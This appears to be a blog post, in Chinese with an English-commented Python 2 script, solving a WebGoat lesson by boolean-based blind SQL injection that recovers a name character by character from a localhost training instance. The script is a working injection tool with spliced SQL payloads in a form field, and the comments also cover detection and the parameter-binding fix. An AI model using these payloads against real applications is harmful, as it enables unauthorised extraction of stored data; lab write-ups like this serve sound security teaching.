这个 task 如果用手工尝试的话, 还是比较麻烦的. 决定用编程解决.
Python处理任务相关的问题比较方便, 花时间入门了下 python, 然后开始写代码, 很简单的原理.
在这期间发现简单的算法都不熟了, 汗.
以下是代码
#!/usr/bin/python
#author: dengzhaoqun
#date: 2013-03-08
#email: dengzhaoqun@163.com
import urllib
import urllib2
import sys
# Target of the exercise: one screen of a WebGoat lesson served from localhost.
# WebGoat is a deliberately vulnerable training application; every request
# this script makes goes to the local instance named here.
url= 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
# Account number the lesson form expects; each probe below is appended to it.
account = 101
# Fragment of the response that the page emits when the submitted condition
# holds. Its presence or absence is the only signal the script reads, which
# is what makes this a boolean-based blind injection: the application leaks
# one bit per request through its own success message.
result = '<p>Account number is valid</form></div>'
def isValid(str):
    """Submit one probe and report whether the page called it valid.

    Sends ``str`` as the ``account_number`` form field together with the
    hard-coded session cookie, then searches the response body for the
    module-level ``result`` marker. Returns True when the marker is present,
    False otherwise.

    The parameter shadows the builtin ``str`` (as ``len`` does further down);
    harmless in this one-off script, but worth renaming in anything reused.
    """
    params = urllib.urlencode({'account_number': str, 'SUBMIT':'Go!'})
    # The session id is a secret committed in source; it is only meaningful
    # for the local lab session it was copied from.
    req = urllib2.Request(url, params, {'Cookie':'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
    f = urllib2.urlopen(req)
    # The response handle is never closed; fine for a short lab run, but each
    # probe leaves a socket to the garbage collector in a longer loop.
    content = f.read()
    ret = content.find(result)
    if(ret == -1):
        return False
    return True
#get name len
# Binary search for LENGTH(name): each probe asks "is the length <= len?" and
# the page's validity message answers yes or no. The search space is 1..100,
# so roughly seven requests pin the length down.
# From the defender's side the traffic is distinctive: a burst of POSTs to the
# same endpoint whose account_number field carries SQL keywords (LENGTH,
# select, SUBSTRING) and differs by a single number each time. A WAF rule or
# log query keyed on SQL tokens inside a numeric-only field catches it.
lenMax = 100
lenMin = 1
while(lenMax > lenMin):
    #print lenMax, lenMin
    # Python 2 integer division (the file uses the print statement and
    # urllib2, so it is Python 2); under Python 3 this would be a float.
    len = (lenMax + lenMin) / 2
    # The probe is spliced into the account_number field unescaped; that it
    # works at all shows the server evidently concatenates the field into its
    # SQL text instead of binding it as a parameter.
    str = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" %(account, len)
    #print str
    valid = isValid(str)
    if( not valid):
        lenMin = len + 1
    else:
        lenMax = len
# The loop exits with lenMin == lenMax: the smallest length the page accepted.
print "--- name len: %d ---" %lenMax
# get name
# Recover the name one character at a time. For position i the inner loop
# binary-searches the ASCII range 'A' (65) .. 'z' (122), asking "is character
# i <= chr(char)?", so each character costs about six requests.
# The fix on the application side is not to filter this input but to bind
# account_number as a query parameter: the spliced condition then becomes a
# literal that matches no account, and the yes/no oracle disappears.
name = ''
for i in range(1, lenMax + 1):
    charMax = 122 # 'z'
    charMin = 65 # 'A'
    while(charMax > charMin):
        #print chr(charMax), chr(charMin)
        # Python 2 integer division, as in the length search above.
        char = (charMax + charMin) / 2
        # SUBSTRING(..., i, 1) is 1-based, which is why i starts at 1.
        # NOTE(review): the <= is evaluated by the database's collation; with
        # a case-insensitive collation the recovered case may not match the
        # stored value -- confirm against the lesson's database.
        str = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" %(account, i, chr(char))
        #print str
        valid = isValid(str)
        if( not valid):
            charMin = char + 1
        else:
            charMax = char
    # charMax == charMin here: the smallest character the comparison accepted.
    name += chr(charMax)
print '--- name: %s ---' % name
运行结果如下:
--- name len: 4 ---
--- name: Jill ---
"Jill" 即是所求的 name.